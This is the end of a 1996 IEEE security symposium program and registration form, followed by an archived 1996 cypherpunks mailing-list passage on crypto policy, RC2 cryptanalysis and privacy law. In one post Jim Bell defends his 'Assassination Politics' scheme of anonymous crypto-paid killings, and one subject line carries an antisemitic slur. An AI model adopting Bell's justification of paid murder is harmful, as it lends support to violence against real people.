11:00-12:00  COVERT CHANNELS

             An Analysis of the Timed Z-Channel
                Ira S. Moskowitz, Steven J. Greenwald, Myong H. Kang

             Defining Noninterference in the Temporal Logic of Actions
                Todd Fine

12:00-13:30  LUNCH

13:30-15:00  PANEL:  Goals for Computer Security Education
                Cynthia Irvine, Chair
                Leslie Chalmers
                Karl Levitt
                Steven F. Barnett
                Jim Schindler
                Roger R. Schell

15:00-15:30  BREAK

15:30-17:00  FIVE-MINUTE RESEARCH TALKS SESSION

             Submissions in the form of one-page ASCII abstracts
             due by email to mchugh@cs.pdx.edu no later
             than 2 April 1996. See http://www.cs.pdx.edu/SP96/
             for more information.
             Abstracts to be distributed at the conference.

18:00-19:30  RECEPTION


TUESDAY, MAY 7

09:00-10:30  DOMAIN SPECIFIC SECURITY

             Security for Medical Information Systems
                Ross Anderson

             Discussion
                Discussants TBA

10:30-11:00  BREAK

11:00-12:00  PROTOCOLS

             Entity Authentication
                Dieter Gollmann

             A Fair Non-repudiation Protocol
                Jianying Zhou, Dieter Gollmann

             Limitations on Design Principles for Public Key Protocols
                Paul Syverson

12:00-13:30  LUNCH

13:30-15:00  DATABASES

             Ensuring Atomicity of Multilevel Transactions
                Paul Ammann, Sushil Jajodia, Indrakshi Ray

             View-Based Access Control with High Assurance
                Xiaolei Qian

             Supporting Multiple Access Control Policies in Database Systems
                Elisa Bertino, Sushil Jajodia, Pierangela Samarati

15:00-15:30  BREAK

15:30-17:00  BIOLOGICALLY INSPIRED TOPICS IN COMPUTER SECURITY

             An Immunological Approach to Change Detection: Algorithms,
             Analysis, and Implications
                Patrik D'Haeseleer, Stephanie Forrest, Paul Helman

             A Sense of Self for UNIX Processes
                Stephanie Forrest, Steven A. Hofmeyr, Anil Somayaji,
                Thomas A. Longstaff

             Cryptovirology: Extortion Based Security Threats and
Countermeasures
                Adam Young, Moti Yung

17:30-19:30  TECHNICAL COMMITTEE MEETING


WEDNESDAY, MAY 8

09:00-10:30  MODELING

             A Security Model of Dynamic Labeling Providing a Tiered Approach to
             Verification
                Simon Foley, Li Gong, Xiaolei Qian

             A Communication Agreement Framework of Access Control
                Martin Roscheisen, Terry Winograd

             Decentralized Trust Management
                Matt Blaze, Joan Feigenbaum, Jack Lacy

             Security Properties and CSP
                Steve Schneider

10:30 11:00  BREAK

11:00 12:30  NETWORKS

             Security Flaws in the HotJava Web Browser
                Drew Dean, Dan S. Wallach

             On Two Proposals for On-line Credit-card Payments using Open
             Networks: Problems and Solutions
                Wenbo Man

             Secure Network Objects
                Leendert van Doorn, Martin Abadi, Mike Burrows, Edward Wobber

             Run-Time Security Evaluation (RTSE) for Distributed Applications
                Cristina Serban, B. McMillin

12:30 12:45  CONCLUDING REMARKS

12:45        SYMPOSIUM ADJOURNS


1996 IEEE SYMPOSIUM ON RESEARCH IN SECURITY AND PRIVACY              _/_/
                                                                  _/    _/
                   REGISTRATION FORM                             _/          _/
                                                                   _/_/   _/_/_/
          Name:_______________________________________________       _/    _/
                                                               _/   _/
   Affiliation:_______________________________________________  _/_/
                                                                    _/_/_/
Postal Address:_______________________________________________     _/   _/
                                                                  _/   _/
               _______________________________________________   _/_/_/
                                                                _/
               _______________________________________________ _/
                                                                  _/_/_/  _/_/
         Phone:_______________________________________________  _/   _/ _/
                                                               _/   _/ _/
           Fax:_______________________________________________ _/_/_/ _/_/_/
                                                                  _/ _/   _/
         Email:_______________________________________________   _/ _/   _/
                                                                _/   _/_/
Note:  Address information will be distributed to attendees.

Please enter the appropriate registration category.  Payment must be included
and must be by credit card or by check in U.S. dollars, drawn on a U.S. bank,
made payable to "IEEE Symposium on Security and Privacy."  Dates are strictly
enforced by postmark.

  Advance registration (up to 29 March 1996)
     ___   Member of the IEEE (Member # ____________, required)........$310.00
     ___   Non-Member..................................................$385.00
     ___   Full-time Student...........................................$100.00
  Late registration (from 30 March 1996)
     ___   Member of the IEEE (Member # ____________, required)........$370.00
     ___   Non-Member..................................................$460.00
     ___   Full-time Student...........................................$100.00

Do you wish to present at a poster session or lead an evening discussion?
                                                               [ ] Yes  [ ] No

Do you have any special requirements?_________________________________________

Please indicate your method of payment by checking the appropriate box:

  [ ] Check in U.S. funds drawn on a U.S. bank (PLEASE ENCLOSE WITH THIS FORM)

  Credit card authorization:
  (Charges will appear on your statement as made by IEEE COMPUTER SOCIETY)

         Visa        MasterCard      American Express     Diners Club
         [ ]            [ ]                [ ]                [ ]

  Credit Card Number:_________________________________________________________

  Card Holder Name:______________________________Expiration Date:_____________

  Signature:__________________________________________________________________

Mail registration to:                     Or FAX this form (CREDIT CARD
        Stephen Kent                      REGISTRATIONS ONLY) to:
        BBN Corporation                   FAX:    +1 617 873-4086
        MS 13/2A                          VOICE:  +1 617 873-6328
        70 Fawcett Street
        Cambridge, MA 02140

>>>>SORRY, NO REGISTRATIONS BY EMAIL.  NO REFUNDS.<<<<


Five-Minute Research Talks Session
==================================
At the 1995 Symposium a session of five-minute research talks was held for the
first time.  These proved very popular, so there will be another session this
year.  It is being held on Monday to give attendees more opportunities to
contact the presenters during the rest of the conference.  If you are interested
in presenting a five-minute talk, please submit a one-page abstract in ASCII
format by email to mchugh@cs.pdx.edu no later than 2 April 1996.  See
http://www.cs.pdx.edu/SP96/ for more information.  Abstracts to be distributed
at the conference.  Please note that the five-minute time limit will be strictly
enforced.


Evening Sessions
================
The 1996 IEEE Symposium on Research in Security and Privacy will accommodate
poster sessions and evening discussions.  There will be rooms with blackboards
and bulletin boards for interested parties to post presentations on work in
progress, recent research results, and innovative proposals, or to lead
discussions on topics of current interest.  These rooms will be available Monday
and Tuesday, May 6 and 7, from 8 p.m. to midnight.  If you are interested in
posting a presentation or organizing a discussion on a particular topic, please
indicate so on the registration form.


Hotel Reservations - The Claremont Resort
=========================================
The Claremont Resort in Oakland, California is 20 minutes from San Francisco and
just over an hour from Napa Valley.  It is situated in the Oakland-Berkeley
hills overlooking the San Francisco Bay on 22 acres of beautifully landscaped
lawns and gardens.  Facilities include the Claremont Pool and Tennis Club and
The Spa at the Claremont.

Oakland Airport is 14 miles from the hotel, or attendees may choose to fly into
San Francisco and rent a car.  SuperShuttle (+1 510 268-8700) provides service
from the San Francisco Airport or the Oakland Airport to the Claremont Resort.
The charge is $15 from Oakland Airport and $18 from San Francisco Airport, per
person one way.  Parking is available at the hotel at a cost of $8 per day for
guests and a maximum of $9 per day for non-guests.

Hotel reservations must be made under the group name IEEE Symposium on Security
and Privacy.  The group rate is $102 single, $114 double occupancy, plus 11%
tax.  The cut-off date for reservations is Saturday, April 6, 1996.
Reservations made after this date will be accepted on a space available basis.
Reservations must be accompanied by an advance deposit or credit card guarantee.
You may cancel your individual reservations up to 72 hours prior to arrival,
after which your deposit becomes non-refundable.  Please be advised the check-in
time is after 3:00 p.m.; check-out is 12 noon.

For reservations and information, contact: The Claremont Resort, Ashby and
Domingo Avenues, Oakland, CA 94623-0363; Phone: +1 800 551-7266 (7 a.m. to
8:30 p.m., PST) or +1 510 843-3000; Fax: +1 510 549-8582.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ErnstZundl@aol.com
Date: Tue, 6 Feb 1996 08:18:13 +0800
To: jamie@voyager.net
Subject: Re: THE JEWS (ALL of them!) Try to kick Ernst Zundel off Usenet!!
Message-ID: <960205183439_313485220@emout05.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


Ich habe kleine Hoden




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark Grant, M.A. (Oxon)" <mark@unicorn.com>
Date: Tue, 6 Feb 1996 03:24:56 +0800
To: cypherpunks@toad.com
Subject: Telecoms Bill
Message-ID: <Pine.3.89.9602051855.A8545-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain



Well, if "cypherpunks write code", is there any code we should be writing 
in response to this?

	Mark





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Tue, 6 Feb 1996 08:25:20 +0800
To: Cypherpunks <alanh@infi.net>
Subject: Re: Sometimes ya just gotta nuke em
In-Reply-To: <Pine.SV4.3.91.960205133946.21142A-100000@larry.infi.net>
Message-ID: <m0tjaYV-0004M0C@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


Alan Horowitz writes:

:   It was lot worse than that on the Japanese-imperialits occupied islands 
: of the Pacific when the Nisei troops choosenot to surrender and instead, 
: mad last-ditch charges against AMerican lines - which killed not a small 
: number of Americans. And of course, there were the suicide bombers.

Who were those second generation Japanese Americans who ``choosenot to
surrender and instead, mad last-ditch charges against AMerican lines''?

I am afraid that I find this all rather cryptic, which I guess makes
it appropriate.

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Tue, 6 Feb 1996 12:26:49 +0800
To: cypherpunks@toad.com
Subject: Disperse/Collect version 1.0
Message-ID: <Pine.SUN.3.91.960205184007.23987B-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


To follow up on a post last year where I suggested that Rabin's 
information dispersal scheme might be useful for sending large files 
across unreliable remailer networks, I built a shareware package called 
Disperse/Collect out of my own Crypto++ library.  Disperse splits up 
files into redundant pieces and encodes them in base 64.  Collect decodes 
them and reconstructs the original files.  You can download this software 
from my home page at http://www.eskimo.com/~weidai.

Wei Dai





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill.Humphries@msn.fullfeed.com (Bill Humphries)
Date: Tue, 6 Feb 1996 22:56:27 +0800
To: cypherpunks@toad.com
Subject: Hey, we are quaint! (Was: A Sign of the Future)
Message-ID: <v01530501ad3c5337c614@[199.184.183.25]>
MIME-Version: 1.0
Content-Type: text/plain


Steve Levy replied to Alex Strasheim over an alledged 'plot' to discredit
cypherpunks at Wired Magazine:

>Give me a break.  I do not work for Wired but I write for them at times,
>and most often my subject is crypto related.

[...]

>On Mon, 5 Feb 1996, Alex Strasheim wrote [citing Gary Wolf 'channeling
>McLuhan']:
>
>> >     Concerns about privacy and anonymity are outdated. Cypherpunks
>> >     think they are rebels with a cause, but they are really senti-
>> >     mentalists.
>>
>> I'm not much for big conspiracy theories, but I like the little ones.

<rant>

Hey folks, we are quaint Jeffersonians for the most part here. We believe
that reasoned arguement should carry the day instead of FUD (fear,
uncertainty and doubt). And that privacy is a good thing. Whereas modern,
marketing driven media (as described by McLuhan) will use FUD and whatever
else it takes to deliver an audience. Ask any of the people who have been
publicly tarred as Nazi's for their involvement over the Zundel/Hollow
Earth/webcom business.

Wolf's portrayal of McLuhan is spot on, because media producers who give a
damn about anonymity and privacy aren't going to land the big contracts.
The money to buy bandwidth and servers wants the highest quality data
availiable so we can be coerced to spend every minute we aren't working,
commuting, sleeping, or fornicating (was f*cking before the CDA) as
'consumers.'

And many people aren't going to think of these issues, not because they are
dumb, but because they are so busy working to provide for their families to
spend any time in the reflective/meditative state required to make
political choices.

I suggest that Cypherpunks add one more slogan to their list:

               "Cypherpunks teach."

Because no one is going to invest in the time and effort to use PGP,
remailers, and blind web proxies unless they understand why they should.
I'm going to invest in the time to show my family and friends why these
technologies are important so when I mention PGP to someone they'll have
something other than the soundbite "only Nazis use strong encryption" to
fall back on.

</rant>

bill.humphries@msn.fullfeed.com
"The more you know, the more jokes you get" -- Tompkins and Kaufman






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Philp <bplib@wat.hookup.net>
Date: Tue, 6 Feb 1996 22:55:17 +0800
To: Duncan Frissell <frissell@panix.com>
Subject: Re: Fair Credit Reporting Act and Privacy Act
In-Reply-To: <2.2.32.19960205200507.006fa0ac@panix.com>
Message-ID: <Pine.OSF.3.91.960205185331.12684C-100000@nic.wat.hookup.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 5 Feb 1996, Duncan Frissell wrote:

> Unfortunately, it would also:
> 
> *  Require government registration of computers and databases containing
> information about people (whether these computers are used by business or
> individuals).  This eases regulation of computers and future confiscation.
> 
I don't believe that this follows at all. All that would be required 
would be a statutory obligation to comply with the legislation. Should a 
breach occur, civil and criminal penalties would apply. No need for prior 
restraint.

> *  Reduce market efficiency by making it harder to match buyers and sellers
> (because neither could easily find out about he other) thus causing higher
> prices and poorer people. 
> 
It would not make it harder for buyers and sellers to get together, it 
would simply increase the risk. It may lead to higher prices, but I am 
prepared to pay something to protect my privacy.

> *  Do nothing to protect personal information from the government which
> would get to collect more of it than ever in the course of enforcing data
> protection laws.
> 
It would be very hard to prevent the government keeping files on you. 
They have requirements such as tax collection etc that would require 
keeping files. What I would like to see is similar protection of my data 
that is stored on goverment computers. Should my information be released, 
the agency responsible should have to pay compensation. Such is the price 
of not keeping my information secret.

> If you don't want people to know things about you, don't tell them.
> 
I agree that in the absolute sense, this is true. However, it is not 
practical to do so in our modern society. If you are prepared to live 
without credit or health insurance you can do this but the price is too 
high for most people to consider.
Regards,
Tim Philp




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Del Torto <bit-bucket@lsd.com>
Date: Tue, 6 Feb 1996 12:06:36 +0800
To: <cypherpunks@toad.com>
Subject: [NOISE] just a few bits shy of a soul...
Message-ID: <v03004a01ad3c5a299d22@[129.46.82.92]>
MIME-Version: 1.0
Content-Type: text/plain


While chatting with a friend recently over brown rice in Boulder CO, he
said something that I found raw-ther amusin'. Thought I'd share it. We'd
been discussing bit-sizes of keys vs fifth-generation NSA cryptanalytical
systems, etc and he said:

 "Wow, it's amazing how much [NSA] computing power is placed in
  service of [such a] '1-bit' consciousness."

Heh...

   dave






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kevin L Prigge <Kevin.L.Prigge-2@cis.umn.edu>
Date: Tue, 6 Feb 1996 10:17:33 +0800
To: cypherpunks@toad.com
Subject: RC2 question [No Nuke Content]
Message-ID: <3116b6973db4002@noc.cis.umn.edu>
MIME-Version: 1.0
Content-Type: text/plain


Could someone throw a little light my way with
regards to the permute[] array being derived from
pi? I'm just not seeing it, I guess. 

Sorry for the interruption, I owe the list several
off-topic flames and a discussion of some random
non-crypto stuff at a later date.

-- 
Kevin L. Prigge         | "You can always spot a well informed man -
UofM Central Computing  |  his views are the same as yours."  
email: klp@tc.umn.edu   |  - Ilka Chase 
PGP Key Fingerprint =  FC E5 EE E7 8B 2E E9 D5  DA 1C 5D 6B 98 52 F6 24  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 6 Feb 1996 20:37:20 +0800
To: cypherpunks@toad.com
Subject: Re: Jim Bell - Murderous Terrorist
Message-ID: <m0tjeyv-00090hC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


[while I am replying to this anonymous, flaming message from what MAY be a 
stable nym, I specifically request a consensus opinion on whether I should 
continue to comment in this way.  Some people say that a discussion of my 
"Assassination Politics" idea (containing, as it does, issues of good 
encryption and digital cash implemented with good encryption and blinding) 
is "on-topic" here, but on the other hand it does seem to bring out the 
flamers among us.  I would be happy to go either way:  To continue to 
respond to what is obviously a strenuous debate, or to ignore the issue 
here, in this area, and to direct the debate to another.]

At 07:06 PM 2/4/96 -0800, jdoe-0007@alpha.c2.org wrote:
>Dr. Vulis writes:
>
>AO> Alan Olsen <alano@teleport.com> writes:
>
>AO> I consider Mr. Bell to be a crank and a loon.
>
>DV> You're certainly entitled to your opinion. You might be interested to 
know that
>DV> I consider Jim Bell to be highly intelligent, knowledgeable, and 
overall nice
>DV> person. I'm particularly impressed by his calm and restrained response 
to your
>DV> provocations. I've also formed a rather negative opinion of you, based 
on your
>DV> actions in this incident.
>
>Jim Bell has advocated nothing less than paid death squads 

No, I haven't.  The term "squad" implies more than one person.  In practice, 
I think those people who are motivated to collect the anonymous awards will 
be individually self-selected people, and will not come in the form of 
"squads."  If anything, the use of a "squad" defeats the entire purpose of 
the anonymity provided by my idea: Quite literally, nobody in the world 
except the killer himself needs to know who he is.

>using crypto as a
>means to hide payment to these murderous terrorists.

<sigh!>   Aside from the fact that the difference between "terrorists" and 
"freedom fighters" is primarily a matter of point of view, in effect you are 
merely objecting to people being able to defend themselves anonymously, by 
proxy as it were.

>  If you can find a conspirator
>of murder as " highly intelligent, knowledgeable, and overall nice person" 
then
>you also are in need of immediate mental health intervention.

As my essay makes clear, the whole purpose of the system is to KEEP most 
people from being "conspirators of murder" by the legal definition.  You may 
disapprove of people being able to defend themselves from government abuse, 
but I actually encourage it. 


>Should the mainstream media ever get wind of Bell's lunacy it will be one more
>nail in the crypto-coffin spurring the Feds and international anti-crypto 
efforts to
>a frenzy.

As you know well, my current opinion is that the theory is tantamount to 
being inevitable.  If anybody is worked up into a "frenzy," it'll be because 
they are afraid I might actually be correct.  Anyone who is really convinced
I am 
wrong will be quite calm, because they "know" nothing will come of my idea.

>  Bell is either a total fucking lunatic of the extreme right wing 

For the record, I was a minarchist libertarian for about 19 years, until
about a year ago when I realized that pure anarchy (with protection for
rights) could actually be made stable.  I have as little sympathy for the
"extreme right wing" as I do the "extreme left wing." 

And as I'm happy to point out, I upset both of their "apple carts" just as
effectively, so both categories have "good" reason to hate me.


>(having
>read his suck ups posts supporting General Linda Thompson)

This is an extremely odd assertion.  While I have certainly heard of Linda 
Thompson (the highly controversial Indiana lawyer) I don't recall having 
written much about her, and certainly not on the Internet and 
certainly not within the last year or so.  I don't think I've ever 
"defended" her, although I have occasionally criticized a few of her critics 
as buffoons.  Because they WERE buffoons!  (This does not automatically make 
Linda Thompson look any better, however.

In fact, the only communication I've ever seen from her on the subject of 
"Assassination Politics" was actually critical.  I responded, correcting 
some false conclusions of hers, and I never heard anything more from her.

Even so, I challenge this guy to show (or even describe the "where and when" 
of these "suck up posts."  


> or an agent provocateur for the Feds. 

This is rich!  I've proposed a system which may spell inevitable doom for 
the Feds no matter what they do, no matter what they try, and this guy tries 
to claim that I'm an "agent provocateur" for them!  In past  posts I've 
mentioned that I carefully considered the question of whether or not my 
posting would help or hinder the adoption of the "Assassination Politics" 
idea, and I came to the conclusion that the worst situation would be if the 
government could keep its ultimate weaknesses disguised for a few more 
years.  That's why I published when I did.

The first person to think of an "Assassination Politics" idea was probably
some well-paid apparatchik in the NSA, who (quite opposite of my position)
was terrified that it might come true.

> One is as bad as the other.  To quote your own
>words to Mr. Olsen; " I've also formed a rather negative opinion of you, based
>on your actions in this incident."
>
>AO> He has no interest in any sort of honest discussion.
>
>DV>  Honest or dishonest, the discussion of Jim's political views has nothing 
>DV> to do with encryption.
>
>His plans for death squads success DEPENDS on the anonymity provided by
>CRYPTO!

Some anti-gunners argue that the public shouldn't be allowed to own guns 
because they might do something wrong with them.  They are fools.  If 
anti-crypto people take the same position with respect to crypto, they are 
even WORSE fools.

Jim Bell
jimbell@pacifier.com

Klaatu Burada Nikto
"Something is going to happen.   Something...   Wonderful!"

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMRbXR/qHVDBboB2dAQFdEgQApk8IhefbWiA9+Ae6ypaHWA6216yTZvYJ
Jox1G/fpdToYeQpfQF6ARCl1dAmLjq7qSe5chJo4IF8W7sMbtSiOKMCNY8xIG6IL
cS3XTRXELyNX8YEsHy7A8bYyaKe0J2X4M1MEcmWqVjt4HiaQ4dConh0pm7zc/5wy
hXTDsvIEaQc=
=D087
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lebkowsky <jonl@well.com>
Date: Tue, 6 Feb 1996 13:04:59 +0800
To: cypherpunks@toad.com
Subject: Mike Godwin at HotWired
Message-ID: <199602060446.UAA17724@well.com>
MIME-Version: 1.0
Content-Type: text


PLEASE RECIRCULATE!

Mike Godwin, staff counsel for EFF and eloquent supporter of civil 
liberties online and off, will be our guest at HotWired's Electronic 
Frontiers Forum this Thursday, February 8, at 7PM PST, 9PM CST, 10PM EST.

Coincidentally, President Clinton is scheduled to sign the Telecom Bill 
the same day, and the '48 Hours of Protest' demonstration will begin when 
the bill is signed.

We encourage online activists to participate in the ongoing EF Forums as a 
chat space wherein we can discuss new developments and issues of 
organization in support of a free and open Internet. A login is required 
but the account is free. We're at http://www.hotwired.com/club or 
telnet://chat.wired.com:2428.

thanks,
Jon L.

http://www.hotwired.com/eff

-- 
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Jon Lebkowsky <jonl@well.com>                      http://www.well.com/~jonl
Electronic Frontiers Forum, 7PM PST Thursdays <http://www.hotwired.com/club>
Vice President, EFF-Austin                     <http://www.io.com/~efaustin>
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daw@dawn7.CS.Berkeley.EDU (David A Wagner)
Date: Wed, 7 Feb 1996 06:05:09 +0800
To: cypherpunks@toad.com
Subject: Re: RC2--Some very preliminary analysis
Message-ID: <199602060250.VAA11055@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <01I0SDBW5VYY984JFR@delphi.com>,  <JMKELSEY@delphi.com> wrote:
[ ... 1/4 of a cycle of RC2: ... ]
> A = rotl(A + f(B,C,D) + sk[i], 1);
     [...]
> Has anyone looked at this cipher with regard to linear attacks?

A little bit.

>           However, it's not clear to me how to build linear
> characteristics that will make it through more than a few rounds of
> alleged-RC2.  Linear characteristics that are spread across many
> subblocks (i.e., partly in A and partly in B) seem to get messed up
> quickly by the rotations.

Hrmm, I'm not convinced that it's so hard to build a linear characteristic;
there are plenty of 1/4-cycle characteristics that don't spread out very
much.  The problem is that I can't find any approximations with high enough
bias to be useful.

So here's some information on the (useless) linear characteristics I've been
thinking about; maybe this will prompt some clever improvement from someone
else.  They're all based on two observations: first, the addition operation
	Y = A + X
has linear characteristics of the form
	Y[i] = A[i] + X[i,i-1]		bias 1/2
	Y[i] = A[i,i-1] + X[i]		bias 1/2
and second, the bit-multiplexing function
	X = f(B,C,D)
has linear characteristics of the form
	X[i] = B[i]			bias 1/2
	X[i] = C[i]			bias 1/2
	X[i] = B[i] + D[i]		bias 1/2
	X[i] = C[i] + D[i] + 1		bias 1/2
	etc.
(A note on notation: X[i] denotes the i-th bit of X, and
X[i,j,k] = X[i] + X[j] + X[k].  If an approximation holds with probability
p, then I say it has bias b = 2 |p - 1/2|; note that adding two approximations
multiplies their biases, and that one needs about 1/b^2 known plaintexts
to take advantage of a linear characteristic for the whole cipher.  Next,
let K denote the 1/4-cycle subkey, and let A' denote the new value of A
after the 1/4-cycle is applied to it.  Also, + denotes xor in approximations.
By 1/4-cycle, I mean something of the form A = rotl(A + f(B,C,D) + K, 1);
so RC2 has 16 full cycles, and each full cycle has 4 1/4-cycles.)

Now given those building blocks for linear characteristics, you can combine
them to get various linear characteristics for 1/4 of a cycle, like this:
	A'[i+1] = A[i,i-1] + B[i] + K[i,i-1]	bias 1/8
	A'[i+1] = A[i] + B[i,i-1] + K[i,i-1]	bias 1/8
	A'[i+1,i] = A[i,i-2] + B[i,i-1] + K[i,i-2]	bias 1/64
	A'[i+1,i] = A[i,i-1] + B[i,i-2] + K[i,i-2]	bias 1/64
	A'[i+1] = A[i,i-1] + C[i] + K[i,i-1]	bias 1/8
	A'[i+1] = A[i] + C[i,i-1] + K[i,i-1]	bias 1/8
	etc.
These don't spread out too well; I haven't completely worked out how to
do many-cycle linear approximations, but I think they shouldn't be too hard
to find.  (For instance, keep only A and C active, or somesuch.)

The real stumbling block is the lack of high-bias linear approximations for
a 1/4-cycle, not the difficulty of combining them, IMHO.  For instance, if
you supposed that there was just one 1/8-bias linear approximation active
in each full cycle, we get a total bias over 16 cycles of 2^{-48}, which
would imply something like 2^{96} known plaintexts for a linear attack.
This is an overly optimistic estimate, since any full 16-cycle linear
characteristic which I can imagine will probably require more than one
linear approximation per cycle.  (It also ignores the non-iterative rounds;
but I think they'll be easy to deal with if you can handle everything else.)

What makes the 1/4-cycle linear approximations have such a low bias is RC2's
extensive use of addition mod 2^32 instead of bitwise xor.

So anyhow, the final word is that I don't see how to do linear cryptanalysis
of RC2, but maybe someone else will have some insights.

P.S. There is an analogue of differential cryptanalysis where we consider the
difference measure as addition mod 2^32 instead of bitwise xor.  Is there
a similar generalization of linear cryptanalysis?  I don't know any, offhand.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMRbB/CoZzwIn1bdtAQEKEAGAujcKp6aM4OV9AoveQaFQdEpQi/hQTSK/
YoMEkSKYtt+aq0Usv5nMHB7ikEflmGak
=TYbl
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Tue, 6 Feb 1996 19:13:21 +0800
To: an359557@anon.penet.fi
Subject: Re: C2 and the Worst Case
In-Reply-To: <9602051739.AA09360@anon.penet.fi>
Message-ID: <199602060551.VAA25665@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


sigh.

http://www.c2.org/members/docs/shell.phtml

	This was fixed *ages* ago.

-- 
Sameer Parekh					Voice:   510-601-9777x3
Community ConneXion, Inc.			FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Decius <decius@montag33.residence.gatech.edu>
Date: Wed, 7 Feb 1996 06:06:36 +0800
To: cypherpunks@toad.com
Subject: Why am I wrong?
Message-ID: <199602060254.VAA26091@montag33.residence.gatech.edu>
MIME-Version: 1.0
Content-Type: text


I am posting this pondering to cypherpunks in hopes that it will be refuted.
Although these ideas are obviously in opposition to those held by 
Denning and the law enforcement community, they are also in opposition to
those held by the Cypherpunks. This idea is bothering me because I cannot 
refute it, although it goes in opposition to many people whom I respect 
greatly. Please tell me why I am wrong about this. (Sorry for the US-centric
perspective, but I think the arguments here apply regardless of what your
system of government may be.)

         	            Crypto-Absolutism
			decius@ninja.techwood.org

	One of the largest problems in the debate over public access to 
cryptography is the fact that both sides of the issue hold absolute beliefs.
They are unwilling to compromise, and often seem unwilling 
to decide on a solution which is anything but a total win for their side.
Many of those who are opposed to cryptography have proposed 
what they claim is a compromise, when in reality these suggestions often 
change the issues instead of addressing them. However, in all conflicts 
there is a middle ground. The answer to the whole crypto debate may be 
in finding it. Nothing ever works in absolutes.
	On one side of the debate we find the law enforcement community. 
This group is totally opposed to the concept of public access to 
cryptography. Although they claim this to be false, the reality is that 
these people think its ok for anyone to keep a secret, as long as no one 
is keeping secrets from them. This belief is founded upon the principle  
that the law is absolute. They believe that the law is always right and 
always good. As Jim Kallstrom, assistant FBI director, put it, "unless 
you're a criminal, you have nothing to fear from the government." 
However, history has proven this philosophy to be totally flawed, time 
after time after time. The law is often very wrong, and even our lofty
constitutional values do not prevent bad laws. When the law is wrong, the 
law's enforcer is the criminal. That is the definition of natural law, 
the philosophy upon which our system of government is based. People MUST 
have the right to dissent. People must have the right to oppose bad 
laws, and in many cases people must have the capability to violate bad 
laws with impunity. It is necessary for the survival and health of our 
society. If people's right to dissent is taken away and bad laws are 
passed, we move immediately into war. Peace is the definition of a 
healthy society. Furthermore, it cannot be assumed that if people can 
commit crimes with impunity that they will. If murder became 
legal, I do not think you would see much of an increase in the murder 
rate. As Socrates would say, if people know the what is good and what 
is bad, they will always choose the good, because the good is what is 
most desirable. That is why law enforcement is very restricted in 
the Constitution. The "compromise" the law enforcement community has 
suggested, key-escrow, is not a compromise at all, because it makes it 
impossible for people to keep secrets from the government. It removes
the people's right to dissent, presumably the very right cryptography 
allows us to protect. The law enforcement community is wrong.
	On the other hand, we have the crypto-anarchists. They believe 
that the existence of anonymous transactions will naturally lend itself 
to a situation where everyone is anonymous, no transaction can be 
tracked, no communications can be monitored, and basically, no 
government can possibly control the transactions and interactions of its 
citizens. They support the broad use of military grade cryptography and 
anominity. Let no message be crackable or traceable. This, also, is an 
absolute belief and it is also flawed. We have governments for a 
reason, we came together and founded societies for protection, and if 
we tore apart our current social structure and created an anarchy, 
people would immediately form small societies for their own fiscal 
protection. Creating an anarchy is a massive step backward in social 
development, not a step forward. Furthermore, PEOPLE WANT TO BE 
ACCOUNTABLE FOR THEIR ACTIONS. No totally anonymous society will 
ever exist in the real world. In fact, many BBSs have tossed out 
anominity, although it works quite well in some communities. The 
right to anominity is very important. As I said before, it is 
important to allow people to express their ideas without fear of 
persecution for their beliefs. However, people want to be accountable 
for many of the things they do. People want recognition, and you cannot 
receive recognition for the actions of your anonymous identity. If 
people really wanted to be totally anonymous all the time, we would all 
be running around the shopping mall with ski masks and fistfuls of small 
unmarked bills. Not only is the idea of crypto-anarchy wrong, but it 
provides those who oppose cryptography an easy concept to attack. As 
Denning said, "Although May limply asserts that anarchy does not mean 
lawlessness and social disorder, the absence of government would lead to 
exactly these states of chaos. I do not want to live in an anarchistic 
society -- if such could be called a society at all -- and I doubt many 
would." The crypto-anarchists are also wrong.
	So who is right?? The concept I propose here is bound to be 
controversial, but I propose it because it must be considered. Lotus is 
right. Currently the internet is ripe for abuse by totalitarian 
governments everywhere. How wonderful the net must be to an insane 
